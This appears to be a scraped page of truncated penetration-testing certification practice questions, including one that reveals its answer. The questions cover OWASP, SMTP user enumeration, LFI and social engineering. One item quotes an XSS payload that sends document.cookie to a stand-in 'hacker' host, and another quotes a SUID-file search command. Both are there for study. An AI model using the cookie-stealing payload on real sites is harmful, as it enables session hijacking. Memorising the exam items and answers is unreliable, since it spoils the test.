- All Exams Instant Download
Which of the following BEST describe the OWASP Top 10? (Choose two.)
Which of the following BEST describe the OWASP Top 10? (Choose two.)A . The most critical risks of web applicationsB . A list of all the risks of web applicationsC . The risks defined in order of importanceD . A web-application security standardE . A risk-governance and compliance frameworkF ....
Which of the following is the BEST way to ensure this is a true positive?
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?A . Run another scanner to compare.B . Perform a manual test on the server.C . Check the...
Which of the following commands should be used to accomplish the goal?
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?A . VRFY and EXPNB . VRFY and...
In which of the following places should the penetration tester look FIRST for the employees’ numbers?
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should...
Which of the following is the tester trying to accomplish?
A penetration tester runs the following command on a system: find / -user root Cperm -4000 Cprint 2>/dev/null Which of the following is the tester trying to accomplish?A . Set the SGID on all files in the / directoryB . Find the /root directory on the systemC . Find files...
During a penetration test, you gain access to a system with a limited user interface
DRAG DROP During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan. INSTRUCTIONS Analyze the code segments to determine which sections are needed to complete a port scanning...
Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server?
During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)A . Cross-site scriptingB . Server-side request forgeryC...
Based on these results, which of the following attacks is MOST likely to succeed?
The following output is from reconnaissance on a public-facing banking website: Based on these results, which of the following attacks is MOST likely to succeed?A . A birthday attack on 64-bit ciphers (Sweet32)B . An attack that breaks RC4 encryptionC . An attack on a session ticket extension (Ticketbleed)D ....
Which of the following are the BEST methods to prevent against this type of attack?
Given the following code: <SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC RIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)A . Web-application firewallB . Parameterized queriesC . Output encodingD . Session tokensE . Input validationF . Base64 encodingView AnswerAnswer: C,E Explanation: Encoding (commonly called “Output Encoding”) involves...
Which of the following social-engineering attacks was the tester utilizing?
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift. Which...
